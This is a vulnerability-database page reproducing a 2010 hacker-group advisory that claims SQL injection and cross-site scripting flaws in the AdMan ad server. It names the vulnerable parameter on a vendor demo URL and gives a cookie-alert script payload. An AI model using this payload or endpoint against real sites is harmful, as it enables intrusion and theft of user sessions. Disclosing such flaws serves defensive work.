Vulners
Lucene search
AdMan Standalone Ad Server Cross Site Scripting / SQL Injection
` ===========================================================
AdMan Standalone Ad Server SQLi AND XSS Vulnerability
===========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm Sid3^effects member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name : AdMan Standalone Ad Server SQLi AND XSS Vulnerability
Date : june, 18 2010
Vendor url :http://www.formfields.com/adManArea/adManDemo.php
Critical Level : HIGH
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_
greetz to :All ICW members and my friends :) luv y0 guyz
#######################################################################################################
DESCRIPTION:
AdMan is a standalone Ad Server that provides publishers with a way to organize ads, view real-time traffic statistics, handle online transactions and interact with advertisers. AdMan is the perfect tool for companies wishing to eliminate commission charges from advertising middlemen and provide more customizable ad products to their advertisers. AdMan is compatible with many other ad management services like Google AdSense, AdBrite, and Commission Junction. This way you can centralize your ad reporting and even provide more customizable ad products to premiere advertisers. Moreover, AdMan utilizes iframes and can therefore be plugged into any existing website architecture. Features: Manage your ads, sell your ads, manage advertisers, provide real time reporting, integrate with 3rd party suppliers, accept credit card payments and much more!
#######################################################################################################
Xploit: SQLI Vulnerability
DEMO URL : http://www.formfields.com/adManArea/adMan1/adMan/advertiser/listActiveAdSpacesForCampaign.php?campaignId=[SQLI]
###############################################################################################################
Xploit: XSS Vulnerability
Attack Pattern: "><script>alert(document.cookie)</script>
DEMO URL :http://www.formfields.com/adManArea/adMan1/adMan/advertiser/listActiveAdSpacesForCampaign.php?campaignId=[XSS]
###############################################################################################################
# 0day no more
# Sid3^effects
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Jun 2010 00:00Current
0.4Low risk
Vulners AI Score0.4